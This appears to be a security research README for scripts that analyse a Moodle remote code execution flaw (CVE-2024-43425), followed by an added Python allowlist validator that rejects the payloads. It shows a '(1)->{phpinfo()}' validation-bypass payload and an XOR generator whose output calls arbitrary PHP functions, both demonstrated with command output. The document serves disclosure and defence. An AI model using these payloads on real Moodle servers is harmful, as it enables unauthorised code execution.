Scripts for Analysis of a RCE in Moodle Calculated Questions (CVE-2024-43425)

RedTeamPentesting/moodle-rce-calculatedquestions

Scripts to Test Input Validation in Moodle Calculated Questions (CVE-2024-43425)

This repository contains the companion scripts to the blog post Back to School - Exploiting a Remote Code Execution Vulnerability in Moodle, which describes a remote code execution vulnerability in the Moodle learning platform.

Test the Validation Logic

The scripts in the validation directory can be used to test input strings directly against the validation logic Moodle uses to prevent abuse of its call to PHP eval().

All code snippets were directly adapted from Moodle's source code, using the 4.4.1 release for the vulnerable version and 4.4.2 for the fixed version. The scripts include the relevant parts of the question/type/calculated/questiontype.php file.

The validation.php file uses the vulnerable validation logic:

$ php validation.php '(1)->{phpinfo()}'
phpinfo()
PHP Version => 8.3.10
[...]

This repository also includes the fixed version of the validation code in validation-fixed.php:

$ php validation-fixed.php '(1)->{phpinfo()}'
error illegalformulasyntax with value: {phpinfo()}
[...]

Generate Function Names

The script xor-generator.py can be used to generate expressions built from PHP variable functions (a string value used as a function name), which allow calling arbitrary PHP functions with a single parameter in vulnerable versions of Moodle:

$ ./xor-generator.py 'PRINTF'
((acos(2) . 0+acos(2)) ^ (2 . 6 . 0 . 0 . 0 . 0) ^ (1 . 0 . 0 . 0 . -8) ^ (0 . -4 . 1 . 8 . 0) ^ (-8 . 3 . 1 . 0 . 0))

$ php -r '((acos(2) . 0+acos(2)) ^ (2 . 6 . 0 . 0 . 0 . 0) ^ (1 . 0 . 0 . 0 . -8) ^ (0 . -4 . 1 . 8 . 0) ^ (-8 . 3 . 1 . 0 . 0))("Test");'
Test
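The two bypasses shown above (the `->{...}` property-access trick and the XOR-assembled function name) both rely on the formula validator letting non-arithmetic syntax through. The following added example, which is not part of this repository and not Moodle's own code from questiontype.php, shows the defensive alternative: a strict allowlist tokenizer that accepts only numbers, `{placeholder}` variables, arithmetic operators and a fixed set of math functions, so both payloads are rejected at the first unexpected character. The function allowlist and the `{a}`-style placeholder syntax are assumptions made for this illustration.

```python
import re

# Hypothetical strict allowlist for formula functions; constructed for this
# example and not taken from Moodle's source.
ALLOWED_FUNCTIONS = {"abs", "acos", "asin", "atan", "ceil", "cos", "exp",
                     "floor", "log", "max", "min", "pi", "pow", "round",
                     "sin", "sqrt", "tan"}

TOKEN_RE = re.compile(r"""
    (?P<num>\d+(?:\.\d+)?)        # numeric literal
  | (?P<var>\{[a-z][a-z0-9_]*\})  # dataset placeholder such as {a}
  | (?P<func>[a-z][a-z0-9_]*)     # identifier, must be an allowlisted function
  | (?P<op>[-+*/%(),])            # arithmetic operators and punctuation
  | (?P<ws>\s+)
""", re.VERBOSE)


def validate_formula(formula: str):
    """Return (ok, reason); reject anything outside the allowlisted grammar.

    Characters such as '>', '.', '^' or '"' never match a token, so the
    property-access and string-XOR payloads fail at the first such character.
    """
    pos = 0
    depth = 0
    while pos < len(formula):
        m = TOKEN_RE.match(formula, pos)
        if not m:
            return False, f"illegal character at offset {pos}: {formula[pos]!r}"
        kind, text = m.lastgroup, m.group()
        if kind == "func":
            if text not in ALLOWED_FUNCTIONS:
                return False, f"function not allowlisted: {text}"
            # A function name is only valid when it is directly called.
            if formula[m.end():m.end() + 1] != "(":
                return False, f"bare identifier: {text}"
        elif kind == "op":
            if text == "(":
                depth += 1
            elif text == ")":
                depth -= 1
                if depth < 0:
                    return False, "unbalanced parentheses"
        pos = m.end()
    if depth != 0:
        return False, "unbalanced parentheses"
    return True, "ok"
```

Running it on the README's two payloads returns a rejection for each, while an ordinary formula such as `({a} + {b}) * 2` is accepted.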
